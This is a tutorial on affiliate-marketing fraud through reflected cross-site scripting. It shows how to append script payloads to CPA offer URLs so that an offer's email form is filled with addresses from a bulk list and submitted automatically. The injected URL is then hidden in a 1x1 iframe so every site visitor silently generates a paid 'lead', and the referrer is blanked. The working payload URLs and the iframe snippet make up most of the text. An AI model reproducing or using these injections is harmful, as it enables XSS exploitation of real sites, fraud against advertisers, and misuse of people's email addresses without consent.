We will navigate through the tutorial using the scientific method because I am extremely bored.
Question
Can we effectively integrate a javascript injection into a URL to be loaded into an iframe so that the form will automatically fill and submit?
Background Research
I already knew how to do a javascript injection directly from the address bar by erasing everything from the bar and typing code, such as:
javascript:alert("Injection.");
which would cause the message "Injection" to pop up on the screen.
However, I needed something that could be appended to a URL so that I could easily put it into an iframe on my site. I resourced Google and found the XSS (Cross Site Scripting) Cheat Sheet at ha.ckers.org. I used the first example to concoct my own injection.
Hypothesis
With the proper injection string, a code can be appended to the end of a query string parameter by using techniques inspired by PHP injection in order to close the hidden input field used for the query string parameter and create our own code to execute javascript.
Materials
You will need:
Large e-mail list
Website
CPA network membership
Knowledge of how to retrieve and update your e-mail list
Procedure
1. You will need to test your e-mail submit CPA offers to see if we can exploit them. Please note that you will need to use your offer's real URL rather than your CPA tracking link.
To test for an exploit, add the following code to the end of the URL then load the page:
"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{alert("Exploited.";});</script>
So your URL will look like:
http://offerplace.com/index.php?id=388&ad=239"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{alert("Exploited.";});</script>
Your offer's URL most likely has parameters in the URL that tell it who's accessing it and who to credit the lead to. It looks something like ?id=293&ad=2898 etc. You've seen them before. Usually, the CPA pages store these values in hidden input field on the page, so those parameters would end up looking like:
<input type="hidden" name="id" value="293">
<input type="hidden" name="ad" value="2898">
As you can see, the parameters just get placed into the HTML. So if you add your javascript injection on to the last parameter, then you can directly manipulate the HTML.
The last parameter in my example was &ad=2898. What if you edited it so you can manipulate the page? Changing it to &ad=2898″><img src="http://site.com/img.jpg adds an image to the page.
Basically, what the site is doing is this:
<input type="hidden" name="ad" value="{your parameter}">
So if you change it, it becomes this:
<input type="hidden" name="ad" value="2898"><img src="http://site.com/img.jpg">
The bold, italic, underlined bit is our "parameter" (*wink*) that we passed. As you can see, we left out the closing "> tag in the URL parameter because the site is designed to add that automatically since it thinks it's going be given a proper value such as 2898. So you can add images…or a javascript code.
2. Now that that rambling is done, we can move on to the actual exploit. You need to find the name of the e-mail input field. If you know how to do this, then great. If not:
Load up the offer's source code. (View>Source, Page>View Source, Tools>View Source, many many ways depending on the browser). Hit CTRL+F to search and search for "<form". This will find the form.
Find the inputs (begin with "<input") and find one that obviously is an e-mail input. E-mail submit pages usually only have 1 or 2 inputs so it won't be hard to find. It will say "E-mail" next to it or the name attribute (name="") will say "email", "em", "appData[em]" or something like that.
Once you find it, take note of what the name attribute is (<input type="text" name="myEmail"> -> name is myEmail).
3. We need to edit our injection to make sure we can inject an e-mail into the form. If your first injection test worked, this will most likely work as well. So load up the offer again without any injection code, just the plain, original URL, and add the following to the end of the URL:
"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";});</script>
So your URL will look like:
http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";});</script>
You will need to replace the blue text with the input name you got in step 2.
Load the page and now the input box should say "email@email.com".
4. If step 3 worked, we can move on. If not, make sure you used the correct input name and kept the proper syntax I provided. If you're sure you did it right and it still doesn't work, then move on to a new offer.
All we need to do now is add one bit of code to submit the offer. So, again with the original URL of the offer, add the following:
"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";document.forms[0].submit();});</script>
So again, your URL will look like:
http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";document.forms[0].submit();});</script>
Load the URL and your form should fill with "email@email.com" then submit automatically.
5. If step 4 worked, all you need to do is include that URL in an iframe. You must use single quotes to enclose the iframe attributes since our URL uses double-quotes and you must keep those double quotes.
So:
<iframe src='http://offerplace.com/index.php?id=388&ad=2398"><script%20src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"%20type="text/javascript"></script><script%20type="text/javascript">$(document).ready(function()%20{document.forms[0].email.value="email@email.com";document.forms[0].submit();});</script>' width='1' height='1' frameborder='0' scrolling='no'></iframe>
You may want to blank your referrer with referer.us. So you would just insert "http://referer.us/" before the URL. Your injection will still work.
Conclusion
You can use this on virtually any web page to turn every visitor into a lead as long as you have a lot of valid e-mails. You will need a way to access your e-mail database and mark them as "used" once you use it to submit your offer. I don't teach that here but the way I do it is with a MySQL database.
I have a table called "mass_mail" with one field called "email" and one called "used". I select the first e-mail where "used" equals "no", use it for the offer, then update "used" to say "yes".
You could also use a PHP array:
$emails = array(
1 => array(
"email" => "email_address",
"used" => "no"
),
2 => array(
"email" => "email_address",
"used" => "no"
)
);
and then search it for the first unused e-mail.
Or store them in a text file.